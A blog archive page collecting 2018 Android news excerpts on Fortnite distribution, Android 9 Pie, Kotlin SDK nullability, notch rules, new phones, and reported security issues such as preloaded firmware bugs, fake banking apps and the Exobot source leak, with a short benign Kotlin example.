Category Archives: Android

Google Play Shows Warning To Anyone Searching For Fortnite APKs

Mark Wilson quotes a report from BetaNews: The arrival of Fortnite on Android has not only been eagerly awaited, but also steeped in controversy. In addition to making the game a Samsung exclusive (for a few days, anyway), Epic Games decided to bypass Google Play and host APK downloads on its own servers. But this isn't going to stop people looking for Fortnite in the Play Store. Google is well aware of this, and that there is the potential for fake, scam apps to appear, tricking users into downloading something malicious. As such, the company is taking action, and is showing a warning to anyone who searches for Fortnite in Google Play. Conduct a search for Fortnite in Google's app store and you'll be greeted by a message that reads "Fortnite Battle Royale by Epic Games, Inc is not available on Google Play." Searchers are also advised that Fortnite rival PlayerUnknown's Battlegrounds (PUBG) is available to download.

Read more of this story at Slashdot.

Millions of Android Devices Are Vulnerable Right Out of the Box

Security meltdowns on your smartphone are often self-inflicted: You clicked the wrong link, or installed the wrong app. But for millions of Android devices, the vulnerabilities have been baked in ahead of time, deep in the firmware, just waiting to be exploited. Who put them there? Some combination of the manufacturer that made it, and the carrier that sold it to you. From a report: That's the key finding of new analysis from mobile security firm Kryptowire, which details troubling bugs preloaded into 10 devices sold across the major US carriers. Kryptowire CEO Angelos Stavrou and director of research Ryan Johnson will present their research, funded by the Department of Homeland Security, at the Black Hat security conference Friday. The potential outcomes of the vulnerabilities range in severity, from being able to lock someone out of their device to gaining surreptitious access to its microphone and other functions. They all share one common trait, though: They didn't have to be there. [...] "The problem is not going to go away, because a lot of the people in the supply chain want to be able to add their own applications, customize, add their own code. That increases the attack surface, and increases the probability of software error," Stavrou says. "They're exposing the end user to exploits that the end user is not able to respond to." Security researchers found 38 different vulnerabilities that can allow for spying and factory resets loaded onto 25 Android phones. That includes devices from Asus, ZTE, LG and the Essential Phone, which are distributed by carriers like Verizon or AT&T.

Read more of this story at Slashdot.

Samsung Announces $1,000 Galaxy Note 9 Smartphone With Last-Gen Android Software Out-of-the-Box

The Galaxy Note 9 touts a slightly larger 6.4-inch end-to-end screen, a 4,000mAh battery that promises "all-day" use, and a minimum 128GB of storage -- there's also a 512GB version that, with 512GB microSD cards, can give you a full terabyte of space. It runs Android 8.1 Oreo -- not Android Pie, which Google and Essential rolled out to some of their devices earlier this month. Engadget: Samsung is also bringing over welcome improvements from the Galaxy S9 family, including stereo speakers and the variable aperture f/1.5-2.4 primary camera (there's a second camera on the back, of course). This year, though, the most conspicuous change revolves around the S Pen. This is Samsung's first S Pen to incorporate Bluetooth, and that lets you do a whole lot more than doodle on the screen. You can use it as a remote control for selfies and presentations, and Samsung is providing a toolkit to let app developers use the pen for their own purposes. And no, you don't need to load it with batteries or plug it into a charger -- it'll top up just by staying in your phone. The base model of the Note 9, featuring 128GB of storage and 6GB of RAM, is priced at $999. The other variant will set you back by $1,250. Preorders begin on August 10th, and the phone will be available on August 24th at all major carriers or direct (and unlocked) from Samsung. CNET writes about the camera sensors on the new handset: The Galaxy Note 9 keeps the same hardware setup as the Galaxy S9 Plus. That is, dual 12-megapixel cameras on the back, one of which automatically changes aperture when it detects the need for a low-light shot. (Samsung calls this dual aperture, and it's also on both S9 phones.) There's also an 8-megapixel front-facing camera for your selfies. What's different is AI software that analyzes the scene and quickly detects if you're shooting a flower, food, a dog, a person. There are 20 options the Note 9's been trained on, including snowflakes, cityscapes, fire, you get it. Then, the camera optimizes white balance, saturation and contrast to make photos pop.

Read more of this story at Slashdot.

Samsung Galaxy S7 Vulnerable To Hacking Due To Meltdown Security Flaw

Samsung Galaxy S7 is, perhaps, one of the most talked about phones by Samsung. Yet, they turned out to be

Samsung Galaxy S7 Vulnerable To Hacking Due To Meltdown Security Flaw on Latest Hacking News.

Smashing Security #090: Fortnite for Android, and the FCC’s DDoS BS

Fortnite players are told they’ll have to disable a security setting on Android, the FCC finally admits that it wasn’t hit by a DDoS attack, and Verizon’s VPN smallprint raises privacy concerns.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault, joined this week by David Bisson.

Google announces Android Pie SDK that is more “Kotlin-friendly”

Google’s Android Pie SDK is now more Kotlin-friendly

At its I/O 2017 developer conference last year, Google announced that Kotlin would become an officially supported language for Android, joining the languages already used for Android app development, such as Java and C++. Kotlin is also predicted to surpass Java as the primary programming language for Android apps by December 2018.

Continuing in this direction, Google, which recently announced Android's new operating system, Android 9 Pie, has also released an SDK that is more Kotlin-friendly.

For those unaware, Kotlin was developed by JetBrains for the JVM (Java Virtual Machine), Android, JavaScript in the browser, and native applications; it can be compiled to Java source code and used alongside Java to build apps. Like Java, Kotlin is object-oriented and statically typed, and it is fully interoperable with Java code. It is designed to solve the same kinds of problems Java does, while adding many nice-to-have features that Java itself does not currently support: a much cleaner syntax, improved code readability, ideas from functional programming, and other improvements over Java. Kotlin's interoperability with Java also makes it possible to call Kotlin code from Java and Java code from Kotlin.

In its new blog post, Google announced that the newly released Android SDK contains nullability annotations for some of the most frequently used APIs, which preserve the null-safety guarantee when your Kotlin code calls into any annotated API in the SDK.

“Normally, nullability contract violations in Kotlin result in compilation errors. But to ensure the newly annotated APIs are compatible with your existing code, we are using an internal mechanism provided by the Kotlin compiler team to mark the APIs as recently annotated. Recently annotated APIs will result only in warnings instead of errors from the Kotlin compiler. You will need to use Kotlin 1.2.60 or later.

“Our plan is to have newly added nullability annotations produce warnings only, and increase the severity level to errors starting in the following year’s Android SDK. The goal is to provide you with sufficient time to update your code,” Google added.

If you want to know how you can use the "Kotlin-friendly" SDK, simply follow the steps below.

1. Go to Tools > SDK Manager in Android Studio.

2. Choose Android SDK in the left menu, and ensure that the SDK Platforms tab is open.

3. Check Android 8.+ (P) and click OK. This will install Android SDK Platform 28 revision 6 if it is not already installed.

4. Then, set your project’s compile SDK version to API 28 to start using the new Android Pie SDK with nullability annotations.

Also, note that if your Kotlin plugin in Android Studio is not up-to-date, you will have to update it. Ensure that your Kotlin plugin version is 1.2.60 or later by going to Tools > Kotlin > Configure Kotlin Plugin Updates.

Once it’s set up, your builds will start showing warnings if you have any code that violates nullability contracts in the Android SDK. You will also start seeing warnings in Android Studio’s code editor if you call an Android API with the incorrect nullability.
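As an added example (not code from the blog post or from Google), the following Kotlin shows the failure the new annotations are meant to catch at build time. It uses the JDK's System.getenv, which carries no nullability annotations, as a stand-in for an un-annotated Android SDK method; the environment variable name is constructed and assumed to be unset.

```kotlin
// Added example, not code from the Android Developers Blog post. A JDK method,
// System.getenv, stands in for an un-annotated Android SDK method: the JDK carries
// no nullability annotations, so Kotlin sees its result as the platform type
// String! and lets the caller pick a nullable or non-null type without complaint.

// Trusting an un-annotated result as non-null. This compiles cleanly, but Kotlin
// inserts a null check at the assignment, so a missing variable fails at runtime
// (NullPointerException on current Kotlin, IllegalStateException on older
// releases) instead of being flagged by the compiler.
fun unsafeLength(name: String): Int {
    val value: String = System.getenv(name)
    return value.length
}

// Treating the result as nullable. Once an SDK method carries a @Nullable
// annotation, this is the only form the Kotlin compiler accepts: a warning for
// the recently annotated APIs in the Pie SDK, an error from the following
// year's SDK onwards.
fun safeLength(name: String): Int {
    val value: String? = System.getenv(name)
    return value?.length ?: -1
}

fun main() {
    // Constructed name, assumed not to be set in the environment.
    val missing = "ANDROID_PIE_NULLABILITY_DEMO_UNSET"

    println("safeLength   -> ${safeLength(missing)}")

    // RuntimeException covers both the NPE and the older IllegalStateException.
    val outcome = try {
        "returned ${unsafeLength(missing)}"
    } catch (e: RuntimeException) {
        "threw ${e.javaClass.simpleName}"
    }
    println("unsafeLength -> $outcome")
}
```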

For more information on the "Kotlin-friendly" SDK, see the Android Developers Blog post cited below.

Source: Android Developers Blog

The post Google announces Android Pie SDK that is more “Kotlin-friendly” appeared first on TechWorm.

Android 9.0 Pie is here: How to get it and what’s new

It’s official: Android P is Android 9 Pie and it is rolling out on Google Pixel devices

The wait is finally over! Google has officially rolled out the stable version of Android 9.0 for smartphones. The next version of the Android operating system is called Android 9 Pie and is now available on Google's own Pixel Android phones via over-the-air (OTA) updates: the Pixel, Pixel XL, Pixel 2, and Pixel 2 XL.

"The latest release of Android is here! And it comes with a heaping helping of artificial intelligence baked in to make your phone smarter, simpler and more tailored to you. Today we're officially introducing Android 9 Pie," Sameer Samat, VP of product management, Android & Google Play, wrote in the official blog post announcing the availability of Android 9 Pie.

Besides the Pixel phones, the Android 9 Pie will also be soon available on phones that were part of the Android P beta program. Google said “Devices that participated in the Beta program from Sony Mobile, Xiaomi, HMD Global, Oppo, Vivo, OnePlus, and Essential, as well as all qualifying Android One devices, will receive this update by the end of this fall! We are also working with many other partners to launch or upgrade devices to Android 9 this year.”

However, the Essential Phone has already started receiving Android Pie. "We're proud to bring Android 9 Pie to Essential Phone the same day it's released! Check your phone now for the update," Essential tweeted from its official Twitter account.

Coming to Android 9 Pie, the new OS “harnesses the power of artificial intelligence to give you more from your phone. Now it’s smarter, faster and adapts as you use it,” says Google.

Features like Adaptive Battery and Adaptive Brightness use machine learning to prioritize system resources for the apps you use, which gives your phone greater longevity and lets its screen adjust better to surrounding conditions. Further, new features like App Actions predict what you're about to do, so that you get to your next task more quickly.

Google has also replaced the traditional three-button navigation bar in Android 9 Pie with a new gesture-based system, similar to what Apple uses on the iPhone X. You can simply switch between apps and get to what you need more naturally by using gestures.

Another feature ‘Slices’ brings relevant parts of your favorite apps to the surface. For instance, you can see real-time pricing and driver ETAs from services like Uber or Lyft when you are searching for a ride. However, Slices will not be available until the Fall for non-beta users.

Another notable feature from Google's I/O presentation about Android P was a broad feature called "Digital Wellbeing." This includes a 'Do Not Disturb' mode that blocks both sound and notifications, while 'Wind Down' mode sets a daily schedule to get your phone ready for bed and even fades your screen to gray to avoid any disturbance. Also included in Digital Wellbeing is an 'App dashboard' that shows users how much time they spend on apps through visual graphs and pie charts, whereas 'App Timers' allow users to set time limits on apps; when that time is up, the app is paused for the rest of the day.

However, these Digital Wellbeing features will be offered as a beta for Pixel users. They will roll out to non-beta users only this fall.

“We’ve built Android 9 to learn from you — and work better for you — the more you use it. From predicting your next task so you can jump right into the action you want to take, to prioritizing battery power for the apps you use most, to helping you disconnect from your phone at the end of the day, Android 9 adapts to your life and the ways you like to use your phone,” said Samat.

Those who own the Google Pixel, Pixel XL, Pixel 2, Pixel 2 XL and Essential Phone can upgrade their devices to Android P by going to Settings > System > System Update and tapping on 'download and install'.


The post Android 9.0 Pie is here: How to get it and what’s new appeared first on TechWorm.

Android Pie: Security and privacy changes

It is official: "Android P" is Android Pie, and it comes with a variety of new capabilities and security and privacy changes. The newest version (9.0) of the popular mobile OS introduces a new system navigation featuring a single home button, smart text selection, digital wellbeing controls, adaptive battery, a neural networks API, smart reply, and more. Security improvements: Android 9 has the following security improvements: built-in support for DNS over TLS, automatically upgrading DNS … More

The post Android Pie: Security and privacy changes appeared first on Help Net Security.

Google Android P is officially called Android 9 Pie

If you have bet on Peppermint, Pancake or Pastry for "P" in the next version of Google's mobile operating system, sorry guys you lose because Android P stands for Android Pie. Yes, the next version of sugary snack-themed Android and the successor to Android Oreo will now be known as Android 9.0 Pie, and it has officially arrived, Google revealed on Monday. Android 9 Pie — 5 Best New

Google Begins Rolling Out Android Pie To Select Handsets

Google on Monday announced that the 'P' in Android P stands for Android Pie, succeeding Android Oreo. It also pushed the source code of the latest version to the Android Open Source Project (AOSP). The latest version of Google's mobile operating system, Android 9.0 Pie, is also starting to roll out today as an over-the-air update to Pixel phones, the company said. From a report: If you don't have a Pixel phone, you won't be getting Android Pie for a while (if at all). During the beta testing phase, Android P was made available on the Sony Xperia XZ2, Xiaomi Mi Mix 2S, Nokia 7 Plus, Oppo R15 Pro, Vivo X21, OnePlus 6, and Essential PH-1. [...] Google wants you to know that Android Pie includes a "heaping helping of artificial intelligence baked in to make your phone smarter, simpler, and more tailored to you." Android Pie offers a slew of new features including built-in support for display cutouts (read: notches), a tweaked Quick Settings panel, a notification drawer with rounded corners, messages in notifications when replying inline, smart replies in notifications, a consistent UI for fingerprint authentication, privacy enhancements to limit what apps can do in the background, Adaptive Battery and Adaptive Brightness features (courtesy of Google DeepMind), App Actions for predicting what the user will do next, App Slices for surfacing an app's user interface inside the Google app's search results and inside Google Assistant, a BiometricPrompt API for a system-managed dialog to prompt the user for any supported type of biometric authentication, and multi-camera APIs that let you access streams simultaneously from two or more physical cameras.

Read more of this story at Slashdot.

Why iPhone and Android Phone Prices Will Get Even Higher

Critics scoffed at Apple when the company priced the iPhone X at $1,000. But given the way the market has responded to it, there is a good chance that the upcoming flagship smartphones from Apple and those of its rivals -- Samsung, Google, and HTC -- will be pricier. From a column: The critics were wrong. Apple CEO Tim Cook said in July that the iPhone X had outsold every other Apple device in each week since it went on sale Nov. 3, 2017. With strong iPhone X sales, Apple proved that mainstream buyers are willing to pay almost as much, if not more, for their cell phones as they would for a powerful laptop. And with rumors of an even pricier 2018 iPhone X Plus-style phone coming down the pike this September, Apple's moves to usher in the era of the $1,000 phone may just be getting underway. Apple isn't alone in boosting mobile phone prices ever higher. Creeping prices on high-end handsets from Samsung, Huawei and even "value" darling OnePlus signal that price hikes are here to stay. In just two years, the cost of Samsung's Galaxy phone for US buyers has spiked 15.1 percent from the Galaxy S7 in 2016 to this year's Galaxy S9, while the Huawei P series has climbed 33 percent since 2016 -- and that doesn't even account for the existence of a "Pro" model. [...] The trend of increasingly costly handsets in the top tier underscores the cell phone's importance as an everything-device for communication, work, photography and entertainment. And as processing power, camera technology, battery life and internet data speeds improve generation after generation, the value people attach to a phone is sure to swell.

Read more of this story at Slashdot.

iKeyMonitor: A parental control app ensuring safety of your child

By Carolina

Parents are raising a completely new breed of kids. Nowadays, toddlers use mobile devices and teens use text messages to communicate. Many schools have also integrated computers and tablets in their curriculum. To ensure children use the Internet safely, parents need a parental control app such as iKeyMonitor. Parents do allow their children to use […]

Read the original post: iKeyMonitor: A parental control app ensuring safety of your child

Android phones cannot have more than 2 notches on display, says Google

Google directs Android smartphone manufacturers to allow only two display cutouts

In one of the latest posts on the Android Developer Blog, Google has laid down ground rules for Android phone manufacturers that allow them to have one or even two display cutouts in a device, but not more than that.

Google has explained how developers should make changes to their app’s code to include only up to two notches and displays with 18:9 or more aspect ratios.

“You won’t see multiple cutouts on a single edge, or more than two cutouts on a device,” said Meghan Potoski, Android UI product manager in the blog post.

For those unaware, the display notch trend was kickstarted by Essential with its PH-1 Android smartphone and carried forward by Apple with the iPhone X. Due to the success of the iPhone X, phone manufacturers are making it the norm to include a notch on 2018 flagship phones. Until now, there are 16 Android devices from 11 OEMs that feature display cutouts.

Therefore, in order to ensure consistency and app compatibility, Google is working with their device manufacturer partners to mandate a few requirements regarding notches.

According to Google, the first requirement is to ensure that cutouts do not negatively affect apps and user experience. For instance, when the device is in portrait mode with no special flags set, the height of the status bar must extend to at least the height of the cutout so that the content can be displayed in the window below. Similarly, if the device is in full screen or landscape orientation, then the entire cutout area must be letterboxed so that none of the content is displayed in the cutout area.

The second requirement mentioned in the blog post is that devices can have only one cutout on each short edge of the device, which means that a single edge cannot have multiple cutouts, or more than two cutouts or notches in total. Also, the cutout cannot be placed on the left or right long edge of the device.

The blog post also explains how developers can make their apps compatible with devices that support display notches. Google has laid down these mandates so that developers can make apps that offer a consistently great experience across devices with one or two display cutouts, as well as devices with 18:9 and larger aspect ratios.

Earlier this year, Google had announced that the forthcoming Android P, its ninth major version of the Android operating system, will have display cutout support that will enable full-screen apps to house notches. With the final version of Android P expected to be released soon, one could see more devices embracing the notch in the coming months.

The post Android phones cannot have more than 2 notches on display, says Google appeared first on TechWorm.

Citing ‘Economic Efficiency,’ Epic Says Fortnite’s Upcoming Android App Won’t Hit Google Play Store

Fortnite developer Epic Games will not be distributing its massively popular game on Android through the Play Store because the store takes a 30 percent cut of the revenue. Instead, the company plans to distribute the software to players via the official Fortnite website, "where Android users can download a Fortnite Installer program to install the game on compatible devices," reports The Verge. From the report: For Fortnite on iOS, Epic decided to distribute the game on the App Store, most likely because it had no other method of getting iPhone users to easily download the software. (Apple, unlike Google, does not allow iOS users to download apps that are not first approved by its internal review processes and distributed through its proprietary marketplace.) With Google and its more open platform, Epic can get away with distributing the app itself. CEO Tim Sweeney says the primary motivation here is twofold. Epic wants to maintain its direct relationship with consumers. (The company currently distributes Fortnite on PC through its own Epic Games Launcher, instead of using Valve's popular Steam platform.) The second reason is financial: Epic does not want to pay Google's 30 percent cut, especially considering the entire game is funded through in-app purchases. "The 30 percent store tax is a high cost in a world where game developers' 70 percent must cover all the cost of developing, operating, and supporting their games," Sweeney says. "There's a rationale for this on console where there's enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers." But on mobile platforms that are open, like Android, "30 percent is disproportionate to the cost of the services these stores perform, such as payment processing, download bandwidth, and customer service," he says. Sweeney adds that Epic is "intimately familiar with these costs" from its direct distribution of Fortnite on Mac and PC. There's no word as to when the Android version of Fortnite will be available, but rumors suggest it will be tied to the upcoming Samsung Galaxy Note 9 launch on August 9th.

Read more of this story at Slashdot.

Motorola Launches Verizon-Exclusive Moto Z3 Smartphone, 5G Moto Mod

Motorola unveiled their new flagship Moto Z3 smartphone today that's upgradeable to 5G. Like other Moto Z phones, the Z3 includes support for Moto Mods, including a new 5G Moto Mod that will let you use Verizon's mobile 5G network when it launches in 2019. The new Mod contains a Snapdragon X50 modem and 2,000mAh battery to help you stay connected to the 5G network. PhoneDog reports: The Moto Z3 is a Motorola phone that's exclusive to Verizon in the U.S. Specs for this Android 8.1-powered smartphone include a 6.01-inch 2160x1080 Super AMOLED screen and 8MP wide angle front-facing camera with f/2.0 aperture. Around back there's a dual rear camera setup with two 12MP cameras, one RGB and one monochrome, along with laser autofocus and portrait mode support. Inside the Moto Z3 lives an octa-core Snapdragon 835 processor along with 4GB of RAM, 64GB of built-in storage, and a microSD card slot. There's a 3000mAh battery and a USB-C port for recharging that battery, as well as support for Motorola's TurboPower solution to recharge in a hurry. Unfortunately, there's no 3.5mm headphone jack to be found here. All of those features are crammed into a body with a water repellent coating. Rounding things out is a side-mounted fingerprint reader and support for face unlock.

Read more of this story at Slashdot.

Google-backed Kotlin Gains Adoption in Open Source Android Apps; Scientists Say It Has Improved Code Quality

Kotlin, which Google blessed last year as an alternative to Java for programming Android apps, has already made its way into almost 12 per cent of open source Android apps, and in so doing has elevated their code quality. From a report: So we're told by computer scientists Bruno Gois Mateus and Matias Martinez, affiliated with the University of Valenciennes in France, who observed that Google at the end of 2017 said Kotlin had infiltrated more than 17 per cent of Android apps developed with its IDE, Android Studio 3.0. Kotlin is an open source statically typed programming language that targets the JVM, Android, JavaScript (transpiling to ES5.1) and native platforms (via LLVM). JetBrains, the company that created it, contends Kotlin is more concise and more type-safe than Java. It estimates that apps written in Kotlin require about 40 per cent less code than they would with Java. With fewer lines of code, in theory, one can expect fewer bugs. In a paper distributed through pre-print service ArXiv, "An Empirical Study on Quality of Android Applications written in Kotlin language," Mateus and Martinez describe how they gathered 925 apps from the open source F-Droid repository, measured the amount of Kotlin code in each, and analyzed the code for "smells" as an indicator of code quality.

Read more of this story at Slashdot.

Mac Virus: Android and OneDrive, and iOS-targeting phish

Tomáš Foltýn for ESET: OneDrive app for Android updated with fingerprint authentication – "With this update, Microsoft is bringing a feature for Android users that has been available on iOS devices for quite a while now." Actually quotes an old blog post of mine: Smartphone Authentication: the Passing of the Passcode? Good to know someone occasionally reads my blogs. 😉

Sean Gallagher for ArsTechnica: Click on this iOS phishing scam and you’ll be connected to “Apple Care” – “This phishing attack also comes with a twist—it pops up a system dialog box to start a phone call. The intricacy of the phish and the formatting of the webpage could convince some users that their phone has been “locked for illegal activity” by Apple, luring users into soon clicking to complete the call.” Commentary from Sophos: Porn-warning security scam hooks you up to “Apple Care”

David Harley

Mac Virus

Blog | Avast EN: The Best and Safest Phones for Kids of All Ages | Avast

Some kids take their first steps into the digital world at the tender age of one, when they discover Elmo apps on the family iPad. By the time we give them their first cell phones, they’re already familiar with the web, basic internet etiquette, and the way mobile devices work — let’s face it, they’re a savvy generation.

Blog | Avast EN

Samsung’s Tab S4 Is Both An Android Tablet and a Desktop Computer

Today, Samsung unveiled the successor to the Galaxy Tab S3 from last year. The aptly named Galaxy Tab S4 features a 10.5-inch Super AMOLED display with a 2560 x 1600 resolution, Qualcomm Snapdragon 835 processor with 4GB RAM, 64GB internal storage (expandable via microSD card) and 13-megapixel f1.9 rear-facing camera. Unlike the Tab S3, it includes Samsung Dex software that lets users connect a Samsung mobile device to a monitor and then use the device as a pseudo-desktop. Ars Technica reports: The first Dex dock came out over a year ago and was designed to be used with Samsung smartphones. Users could plug their device into the dock, connect it to a monitor, pair a keyboard and a mouse, and use the setup as they would a full desktop PC. The system ran a version of Android that Samsung modified to better suit a desktop UI, which included a lock screen and a task bar area with app icons. Dex on the Galaxy Tab S4 works just like this, with a couple of extra features that leverage the power of a tablet. When connected to a monitor, both the big screen and the tablet's screen can be used simultaneously. In a short demo, Samsung showed how the device supports up to 20 open windows at once and how features like split screen and drag-and-drop can be used just as they would on a desktop PC. Users can launch Dex when not connected to a monitor as well, and that produces the same modified Android UI on the tablet's 10.5-inch, 2560 x 1600 Super AMOLED display. The tablet carries a $649 price, but includes all the specs mentioned above, as well as support for signature Samsung features like Air Command, translate, and off-screen memos, and a redesigned S Pen.

Read more of this story at Slashdot.

Fake Android Banking Apps Leak Credit Card Details Online

Three fake Android banking apps phished for users’ credit card details and then leaked them online by transferring them to an exposed server.

On July 26, 2018, Slovakian security firm ESET reported that it notified Google about the three fake banking apps that were uploaded to the Google Play Store in June and July 2018. Each of the impostor programs promised to increase users’ credit card limits at one of three Indian banks and presented users with a form to supposedly collect their credit card information.

Upon completing the forms, the apps directed users to a final screen indicating that a “customer service executive” would be in touch soon. Instead, the applications sent users’ information in plaintext to a server where anyone with a link — not just the attackers — could access the saved data.

Fake Android Banking Apps Exploit Common Mobile Security Weaknesses

This campaign highlights attackers' ongoing interest in mobile banking, which has given rise to a host of new security threats. First, fraudsters are now targeting users with fake mobile banking apps, and users often can't distinguish between real and potentially malicious programs. According to Avast, 36 percent of users have mistaken fraudulent banking applications for legitimate ones.

At the same time, banks’ legitimate mobile applications often suffer from security weaknesses themselves. For instance, researchers at the University of Birmingham in the U.K. discovered in December 2017 that even some “high-security” banking, stock trading, cryptocurrency and virtual private network (VPN) applications were susceptible to man-in-the-middle (MitM) attacks due to failure to verify the hostname.

How Can Organizations Stave Off Mobile Banking Threats?

Security professionals should adopt a multipronged approach to defend their organizations against the threat of fake mobile banking apps. IBM experts recommend investing in mobile threat prevention (MTP) solutions, as well as a mobile device management (MDM) platform that allows access to only certain approved applications.

Security leaders can also protect Android devices from fraudulent apps by implementing unified endpoint management (UEM) and over-the-air (OTA) support.

Sources: WeLiveSecurity, Avast, University of Birmingham

The post Fake Android Banking Apps Leak Credit Card Details Online appeared first on Security Intelligence.

Unknown Actor Leaks Android Malware Exobot Source Code

An unknown actor leaked the source code for the Android malware Exobot online, leading to fears of new attack campaigns.

In June 2018, the unknown individual sent a copy of Exobot’s source code to Bleeping Computer, which subsequently shared it with security companies ESET and ThreatFabric. The companies confirmed that the code was for version 2.5 of Exobot, an Android banking Trojan that is based on the Marcher Android malware, according to IBM X-Force researchers.

The source code for Exobot first appeared online in May 2018 after someone who purchased it from the author decided to share it with the malware community.

Why the Source Code Leak Could Foreshadow a Massive Attack

Bleeping Computer researchers observed Exobot’s source code being distributed on “quite a few” underground web marketplaces after receiving its copy. This fact is concerning because previous malware source code leaks have led to surges of new attack campaigns.

For instance, Level 3 Threat Research Labs identified 213,000 Mirai-enslaved bots via communication with the command-and-control server before the release of the malware’s source code. After this event, the team discovered that the number of Mirai bots more than doubled, increasing to 493,000.

This incident occurred just before Mirai staged its infamous distributed denial-of-service (DDoS) attack against Dyn’s managed Domain Name System (DNS) infrastructure in late 2016.

How to Protect Mobile Devices From Android Malware

To protect their organizations against the repercussions from malware source code leaks, IBM experts recommend adopting a broad approach to mobile threat prevention. This strategy requires investing in a unified endpoint management (UEM) solution to scan devices for potential threats and setting up network protocols to help remediate a malware infection.

These features should also include real-time compliance rules and alerts to help automate the process of malware remediation and removal on mobile devices.

Sources: Bleeping Computer, NetFormation

The post Unknown Actor Leaks Android Malware Exobot Source Code appeared first on Security Intelligence.

Android and Apple users affected by a Bluetooth vulnerability

A few days ago, the United States Computer Emergency Readiness Team (US-CERT) issued a statement informing the public about a Bluetooth vulnerability. The flaw has been seen on equipment using Qualcomm and Intel chipsets, as well as Broadcom devices, meaning that almost every Android and Apple user in the world could have become a victim of cybercrime. The vulnerability affects Bluetooth firmware and operating system software drivers, and it allows remote attackers to obtain sensitive information.

Attackers within Bluetooth range of two connected devices have been able to utilize a man-in-the-middle network position allowing them to log all information exchanged between the connected devices. The vulnerability lets hackers decrypt, monitor, and even interfere with the traffic sent between the two devices. Millions of devices have been susceptible to being penetrated. A missing validation in the encryption method used in Bluetooth is named as the main reason for the vulnerability – hackers have been able to obtain the keys required to unmask information that is supposed to be encrypted.

Luckily, obtaining the keys is not possible 100% of the time, and if even one of the connected smart devices has a fully up-to-date OS, hackers are not able to interfere with the connection. In a statement, Bluetooth SIG highlighted that for an attack to be effective, the hacker would not only need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure, but would also need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. Not an easy task!

All affected vendors have issued patches to address the vulnerability. If you’ve been delaying the software update on your phone or a tablet, now is the perfect time to charge up your smart devices and leave them to perform the updates.

We remind you that Bluetooth exploits are nothing new, and such exploits could be used against you. The best way to avoid becoming a victim of cybercrime is to have quality antivirus software installed on all your smart devices, and to make sure all your devices are running the latest versions of their operating systems. Lastly, turn off Bluetooth when you are not using it: you will decrease the chances of getting hacked, and you will increase your device's battery life.

The post Android and Apple users affected by a Bluetooth vulnerability appeared first on Panda Security Mediacenter.

Sony’s Mobile Business Is Shrinking Out of Existence

The latest earnings report from Sony indicates the company's already tiny smartphone business has shrunk by almost half. "In the quarter ending in July 2018, Sony managed to sell only 2 million mobile devices, down 1.4 million from the same period in the preceding year," reports The Verge. From the report: In its 2017 accounting year, Sony sold 13.5 million phones, and back in April its modest estimate for 2018 was 10 million, but now that's been revised down to 9 million. Anticipating it will make only $5.49 billion of mobile sales for the entire fiscal 2018, Sony is now in a close contest with HTC for the title of being the least relevant global Android device vendor. At least BlackBerry has its promise of uniquely secure phones and keyboards with actual, physical buttons on them. Sony's signature mobile feature in recent times has been an insistence on shipping massive bezels for way too long. It's important to note that while Sony's mobile business is hurting, Sony as a whole is in good financial health.

Read more of this story at Slashdot.

Google Bans Android Phones From Having Three or More Notches

Google is building official notch support into Android P, but it's laying out some ground rules first: two notches is the limit. From a report: In a blog post for developers yesterday, Android UI product manager Megan Potoski wrote that Google is working with device partners "to mandate a few requirements" for app compatibility purposes. Among those are limits on notches. The mandate says that Android P phones can't have "more than two cutouts on a device." Only one notch is allowed per side, and notches are only allowed on the top and bottom edges -- not the left and right.

Read more of this story at Slashdot.

WhatsApp finally rolls out group video and voice calls

WhatsApp launches encrypted group video and calling for everyone

Back in May, Facebook at its F8 developer conference had announced that it would be adding group calling support for video and voice on WhatsApp later this year.

Starting yesterday, Facebook-owned WhatsApp has officially rolled out the group video & audio calling feature and made it live for users across the world on iOS and Android. This feature allows you to make a group call with up to four participants at the same time. In other words, only four people can be on the group video call simultaneously.

“You can make a group call with up to four people total – anytime and anywhere. Just start a one-on-one voice or video call and tap the new “add participant” button in the top right corner to add more contacts to the call,” WhatsApp said in a statement.

Currently, users make over 2 billion minutes of video and audio calls through WhatsApp every day.

“Group calls are always end-to-end encrypted, and we’ve designed calling to work reliably around the world in different network conditions,” WhatsApp added.

To make use of the feature, users will have to download the latest version of WhatsApp app from the Google Play Store or the Apple App Store.

You can follow the below steps if you want to make a video call.

Step 1: First, make a video or an audio call to a single participant, and then click on ‘Add Participant’ option at the top right corner of the screen.

Step 2: This will show up your contact list and then you can choose your participants who you want to add on the group call.

Step 3: Once the participant is added to the group video call, all the participants, including the new and those who are already on call will be notified by WhatsApp.

The app lets you add only one person at a time. Once all the contacts are added, the screen is split into four on everybody's device, so everyone can see each other. Note that only the first caller, the host who started the conversation, can add people to the video call.

Currently, Facebook Messenger supports group video calls of up to 50 participants, while Snapchat supports 16. On the other hand, Apple's FaceTime will support up to 32 people at a time when iOS 12 launches later this year.

Source: WhatsApp

The post WhatsApp finally rolls out group video and voice calls appeared first on TechWorm.

YouTube is rolling out the ‘dark mode’ theme for Android devices

Android users can now use YouTube’s ‘dark mode’ theme on their devices

We had reported last year that Google-owned YouTube, the most popular video streaming website, was testing a new ‘dark mode’ feature that is expected to cause less eye strain while watching YouTube videos at night or in dimly lit environments. While Google brought the dark theme to desktop users late last year, and to iOS users earlier this year, Android users still had to wait for this update.

Looks like the wait is finally over for at least some Android users, who reported that the dark theme was mysteriously applied when they opened the official YouTube app on Android. The app also served a pop-up at the bottom of the screen informing that this feature is available now. The dark mode comes with a toggle that allows the user to switch off the mode and revert to the light theme, if they wish to.

Although Google has not officially announced the feature, this mode is now available for Android. The dark theme basically reverses the color of the YouTube app UI (user interface) by replacing the white background with black. Apparently, the color isn’t really black but it is more like a dark grey.

It appears that the rollout of the dark mode theme on Android devices is happening in phases, and the remaining Android users should see the change on their devices in the coming days or weeks.

Check out how you can enable YouTube dark mode on your Android device:

Step 1: First, launch the YouTube application.

Step 2: Then, tap on your profile icon that appears on the right top corner.

Step 3: Go to Settings > General.

Step 4: Tap on the toggle for “Dark theme” to enable it.

Step 5: Tap on the back button, the theme is automatically saved.

The post YouTube is rolling out the ‘dark mode’ theme for Android devices appeared first on TechWorm.

Threat Actors Breach Consumer Devices to Build IoT Botnets

